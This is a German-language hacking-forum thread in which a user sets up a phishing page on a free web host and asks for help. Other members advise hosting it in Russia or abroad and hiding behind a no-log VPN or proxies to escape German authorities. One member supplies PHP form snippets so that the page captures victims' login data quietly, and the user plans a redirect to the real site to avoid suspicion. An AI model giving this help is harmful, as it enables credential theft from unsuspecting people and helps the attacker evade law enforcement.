Filezilla / Probleme mit FTP/HTTP

[Freak1936]

Moin Free-Hackers,
hab da mal ain paar Noob fragen ...

1.Nur FTP nich HTTP ...
also ich hab mir jetzt nen acc bei bplaced erstellt und auch gleich nee test phising seite hochgeladen (nutze Filezilla). Aber mein Problem ist jetzt ich kann diese test seite nur als ftp:// und nicht als http:// betrachten, vorher muss ich auch noch immer die login daten ausfüllen (Ben.name und Pw für den bplaced acc).
Die dateiattribute für den ordner hab ich auf 777 gestellt .... oder brauche ich auf jedenfall dafür erst die subdomain ?

2.Wie sicher ist Filezilla .... ?
Natürlich will ich ja auch nich irgendwann ärger mit den grünen menschen bekommen und deshalb stellt sich mir die frage: Kann man für den Datentransfer zb. mit dem Filezilla client irgendwie einen Proxy oder sowas dazwischen setzen ? (Für den bplaced host und den E-Mail acc kann man ja Tor oder andere Proxys nutzen ....)

BTW: Dankeschön an Gumball für den sehr aufschlussreichen Sticky !

[inmate]

Also der Webhoster ist das Problem , nicht Filezilla.
Nimm nen Ausländischen Webserver und nicht Funpic oder so.
Da ist deine Page nach 2 Tagen down.

Und kla kannst du deine Page erreichen über http.

Du musst es nur so:
http://deinepage.fr.funpic.de/login.php oder halt welche .php du dabei liegen hast schreiben.

mfG

[Freak1936]

Tatsache jetzt gehts doch mit http//:, hatte ich eigentlich vorher probiert (wohl ein wenig zu blöd angestellt ^^)

Dank dir für die schnelle Hilfe inmate

[Zylasty]

Und zu der Proxy Frage würde ich mich mal in der SichherheitsSection erkundigen unter Anonymität und Proxy oder so. Am besten ist es du kaufst dir ne non-logging VPN und gut ist! Tor & so Dreck bringts 0% anonym... Die speichern den Log und vllt auch Traffic, aber bei Traffic bin ich mir nicht sicher.

[Freak1936]

Nagut Zylasty, ich werde mich auf jeden fall mal in richtung VPN schlau machen ^^(noch iss ja alles nur zu testzwecken ...)
Und wenn ich jetzt nen zb. Russischen Hoster wähle, brauch ich VPN dann überhaupt noch, also sicherer wäre es ja bestimmt, aber lohnt der aufwand wirklich (die russen müssen die logs im gegensatz zu deutschen hostern nich rausrücken) ?

Und wie ist das eigentlich mit der Subdomain, muss man da genau so vorsichtig sein ... ?

[VeN0m]

Der Proxy dient ja dem, dass sie den Besitzer der Seite nicht ausfindig machen können. Soweit ich weiß können die deutschen Behörden zwar nicht die Seite down nehmen, wenn sie in Russland steht aber wohl die Person belangen, wenn sie in Deutschland lebt. Daher der Proxy. Ein russischer Anbieter an sich ist soweit ich weiß sicher genug vor Behörden etc. Aber wenn Du daran was änderst nutze einen Proxy .

[Freak1936]

Jo alles klar Power-Sven

Wie basstele ich denn am besten den submit button in eine seite ein, also ich mein damit wo im Quellcode wird die adressse für die echte zieladresse deklariert wird ?
Diese müsste ich ja eigentlich nur gegen eine von mir manipulierte adresse austauschen, sodas die logindaten dort aufgezeichnet werden (sowas macht man mit php oder ?) und der user dann auf die echte loginseite weiter geleitet wird damits nicht so auffällt ....

Hat einer viell. nen kleinen beispiel code für soetwas da (den Senden Button bzw. wie er deklariert wird wohin der button die daten schickt und anschliessend zur echten seite verbindet)?

[VeN0m]

Der Submit-Button dient lediglich dem Absenden des Formulars. Wohin das ganze geht steht im Formular:

Code:

<form method="post" action="wohin es geht">

Aber warum verstecken? Sende es doch einfach an das eigene Script und füge unten noch einen PHP-Teil ein. Dieser wird natürlich nicht gezeigt, da PHP im Quellcode nicht ersichtlich ist:

Code:

<form method="post" action="<?php print htmlentities($_SERVER['PHP_SELF']); ?>">

PHP_SELF enthält den Pfad und den Namen des aktuell aufgerufenen Scriptes (es wird also an sich selbst gesendet). Print sollte klar sein (etwas ausgeben). Htmlentities *klick, ich bin ein Manual-Link* ist zum verhindern von XSS über PHP_SELF.
Ein Formular, dass an das eigene Script gesendet wird verdächtigt natürlich niemand...

Du musst natürlich im PHP-Teil dann einfügen:

Code:

if($_POST) { der weitere Code }

Beziehungsweise

Code:

if(!empty($_POST)) { der weitere Code }

Empty *klick*

Viel Erfolg .

[Freak1936]

Ey cool danke, bist mir echt nee riesen hilfe Super-Sven werd mich mal gleich ranmachen und versuchen das so umzusetzen ....